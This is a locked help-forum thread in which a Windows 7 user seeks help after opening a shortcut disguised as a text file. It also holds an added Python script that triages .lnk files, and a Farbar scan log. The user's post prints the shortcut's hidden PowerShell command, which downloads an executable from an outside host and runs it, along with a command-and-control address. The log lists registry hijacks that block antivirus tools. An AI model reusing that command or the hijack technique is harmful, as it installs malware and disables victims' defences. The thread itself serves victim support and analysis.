Windows 7 System Virus


  • This topic is locked
27 replies to this topic

#1 jumpman17

Posted 14 October 2016 - 10:13 AM

I'm running Windows 7. I feel like a complete idiot and got tricked into opening a txt file that was actually a lnk file which then quickly ran a program, locked up my PC, and upon reboot, had 2 new accounts created. They were GuestAcc and TEST. I tried to open my normal account but it just loads to a black screen with the mouse icon. Ctrl+Alt+Del and picking Task Manager makes a Command Prompt window open and close instantly. I have the hard drive hooked up as an external drive right now on my other computer and I'm doing a full scan with Malwarebytes to see if that finds anything, but I don't think it's going to help with the kind of problem this is.

 

Here is the little bugger that ran and caused this. Hopefully this will give someone an idea of what it did and hopefully with your help I can fix this. Thanks.

 

EDIT: After spending all day on this, I think I may have mostly solved this. Malwarebytes did not find anything after completing its scan. I hooked my drive back up to my PC and found that while Safe Boot would only boot to a black screen, Safe Boot with Command Prompt would load the Command Prompt. From there I was able to run programs (except for things like regedit or taskmgr which still wouldn't). So I continued my hunt and found that a new file was created today located at C:\Users\Me\AppData\Roaming\Oracle\JavaUpdate.exe. I could not delete it because it was in use it said. I found a startup task of "Rundll32.exe shell32.dll, ShellExec_RunDLL C:\User\Me\AppData\Roaming\Oracle\JavaUpdate.exe" and when I would end the task, it would instantly restart. So I hooked the drive up again to my other computer and deleted the JavaUpdate.exe file, then hooked it back up to my PC. This finally let me boot to my desktop. From there I deleted the startup key, deleted the other 2 user accounts it created.

 

But...my fear was still something I saw while working in Command Prompt. Every once in a while, upon loading Command Prompt, it would show "Connecting to: 158.69.175.140:5678". I had unplugged my Ethernet cable the second my computer had locked up originally so it would never actually connect. Before plugging my internet back in though, I blocked all incoming and outgoing traffic to that IP address in Windows Firewall just to be safe.

 

So basically, here's where I'm at. Did I get all the pieces to this virus? Also, regedit and taskmgr still don't work. I haven't worked on those yet because frankly, I'm exhausted and my head hurts.

[.lnk file contents; readable strings only]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cdn.che.moe/bfomvf.exe','%TEMP%\svchost.exe');Start-Process '%TEMP%\svchost.exe'
%SystemRoot%\system32\imageres.dll
S-1-5-21-716928487-3734272279-3876062121-1001
bless-pc


Edited by jumpman17, 14 October 2016 - 09:43 PM.
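
Added example, not part of the original posts: a Python triage script that parses a shortcut like the one pasted in post #1 and flags the traits visible in that dump (a script host as target, a hidden window, a download call, an icon taken from another file). The field layout follows Microsoft's MS-SHLLINK specification; the marker lists, the cp1252 fallback and the function names are assumptions, and the sample shortcut is constructed inline with a placeholder URL.

```python
import ntpath
import struct

# Constants from the MS-SHLLINK specification (shell link binary format).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
# Assumed, illustrative heuristics; tune them for your environment.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe"}
ARG_MARKERS = ("-windowstyle hidden", "-executionpolicy bypass",
               "downloadfile(", "start-process")


def parse_lnk(data: bytes) -> dict:
    """Extract the path and string fields of a .lnk; ValueError if malformed."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link (.lnk) file")
    try:
        return _parse_body(data)
    except struct.error as exc:
        raise ValueError("truncated shell link") from exc


def _parse_body(data: bytes) -> dict:
    (flags,) = struct.unpack_from("<I", data, 20)
    out = {}
    pos = 76                                   # fixed-size header ends here
    if flags & HAS_IDLIST:                     # skip the LinkTargetIDList
        (size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINKINFO:                   # LinkInfo may hold the full path
        size, _hdr, li_flags, _vol, base_off = struct.unpack_from("<5I", data, pos)
        if li_flags & 0x1 and base_off:        # VolumeIDAndLocalBasePath
            start = pos + base_off
            end = data.index(b"\x00", start)
            # ANSI strings use the creator's code page; cp1252 is an assumption.
            out["local_base_path"] = data[start:end].decode("cp1252", "replace")
        pos += size
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    for bit, field in STRING_FIELDS:           # StringData, in spec order
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)
        raw = data[pos + 2:pos + 2 + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData")
        out[field] = raw.decode(codec, "replace")
        pos += 2 + count * width
    return out


def triage(link: dict) -> list:
    """Return human-readable findings for a parsed shortcut."""
    findings = []
    target = link.get("local_base_path") or link.get("relative_path", "")
    exe = ntpath.basename(target).lower()
    if exe in SCRIPT_HOSTS:
        findings.append(f"target is a script host: {exe}")
    args = link.get("arguments", "").lower()
    for marker in ARG_MARKERS:
        if marker in args:
            findings.append(f"arguments contain {marker!r}")
    icon = ntpath.basename(link.get("icon_location", "")).lower()
    if icon and exe and icon != exe:           # weak signal on its own
        findings.append(f"icon taken from {icon}, not from target {exe}")
    return findings


def build_sample_lnk() -> bytes:
    """Constructed test input: header plus Unicode StringData only."""
    strings = [
        (0x08, r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
        (0x20, "-ExecutionPolicy bypass -noprofile -windowstyle hidden "
               "(New-Object System.Net.WebClient).DownloadFile("
               "'http://example.invalid/a.exe','%TEMP%\\svchost.exe')"),
        (0x40, r"%SystemRoot%\system32\imageres.dll"),
    ]
    flags = IS_UNICODE | sum(bit for bit, _ in strings)
    blob = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(76 - 24)
    for _, text in strings:
        blob += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return blob


if __name__ == "__main__":
    link = parse_lnk(build_sample_lnk())
    for key, value in link.items():
        print(f"{key}: {value}")
    for finding in triage(link):
        print("FLAG:", finding)
```

Run it against a copy of the suspect file read in binary mode on an analysis machine; the parser only reads bytes and never resolves or launches the shortcut.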




#2 TsVk!


Posted 18 October 2016 - 11:05 PM

Hi jumpman17

 

My name is TsVk!, but you can call me John. I'll be helping you with your issue. :)

 

Just a few ground rules before we get started.

  • Please don't run any malware removal programs unless directed.
  • Please don't make any system changes unless directed.
  • Please back up all essential data now. We are removing software designed to damage/compromise your system, it's inherently risky business.
  • Please copy and paste all logs in plain text straight into your reply, do not quote or attach logs.

These things are to make it easier for me to help you.

 

Download Farbar Recovery Scan Tool.

  1. Choose 32bit or 64bit depending on your Windows version. If you are unsure click here.
  2. Save the application to your desktop and run it.
  3. Click Yes to allow the application.
  4. Click Scan, wait for the log to appear.
  5. Copy and paste the results into your next reply.

 

Please be aware that I am still in training and everything that I say needs to be covered in detail with my instructor. This is a bonus for you because you have two sets of eyes on your thread, but you need to be aware this can take some time so my responses may take a day or so.

 

TsVk!



#3 jumpman17


Posted 18 October 2016 - 11:36 PM

Thanks for the reply, TsVk. Here are the requested logs.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
Ran by Kevin (administrator) on KEVIN-PC (19-10-2016 00:12:02)
Running from C:\Users\Kevin\Desktop
Loaded Profiles: Kevin (Available Profiles: Kevin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\Common\HPSupportSolutionsFrameworkService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe
(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
(Rocket Division Software) C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(BitTorrent Inc.) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
(BitTorrent Inc.) C:\Users\Kevin\AppData\Roaming\uTorrent\updates\3.4.9_42606\utorrentie.exe
(BitTorrent Inc.) C:\Users\Kevin\AppData\Roaming\uTorrent\updates\3.4.9_42606\utorrentie.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(AOL Inc.) C:\Program Files (x86)\AIM\aim.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8447192 2015-02-05] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-09-09] (Apple Inc.)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [67384 2016-09-01] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [2621440 2010-06-10] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [296216 2015-01-27] (Intel Corporation)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\Run: [uTorrent] => C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe [1977536 2016-10-07] (BitTorrent Inc.)
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [241664 2010-11-20] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1403304 2016-01-28] (Garmin Ltd. or its subsidiaries)
IFEO: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\acs.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\adoronsfirewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AgentSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alertwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALMon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AntiHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\app_firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\apvxdwin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\armorwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\as3pf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\asr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aupdrun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\authfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avas.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastUi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avcom.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVK.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKProxy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKWCtlx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctrl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avmgma.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avpmapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aws.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\backgroundscanclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Bav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bavhm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavUpdater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavWebClient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BDSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BgScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blinksvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bootsafe.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuardUpdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuarScanner.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\capinfos.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavApp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavasm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavAUD.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavCons.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavEmSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavmr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavMud.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavoar.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavQ.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSub.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUMAS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUserUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavvl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavwp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas17.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdinstx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CEmRep.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cis.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CisTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamscan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmdagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmgrdian.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configuresav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CONSCTLX.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreFrameworkHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreServiceShell.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\csi-eui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CV.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\DCSUserProt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dlservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dltray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dragon_updater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dumpcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dvpapi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dwengine.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econceal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\editcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekern.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekrn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\emlproui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\EMLPROXY.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\endtaskpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\espwatch.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Ethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fameh32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filedeleter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall2004.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewallgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPAVServer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FProtTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclamwrap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsgk32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSHDLL64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fshoster32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSM32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSMA32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsorsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsrt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fssm32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fwsrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\gateway.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDKBFltExe32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDSC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GpChromeDatabasegInx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxkickoff_x64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\hpf_.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iface.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\InstLsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\invent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipatrol.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipcserver.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipctray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iptray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7AVScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7CrvSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7EmlPxy.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7FWSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7PSSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7RTScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7SysMon.Exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSecurity.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMngr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4gui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4ss.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
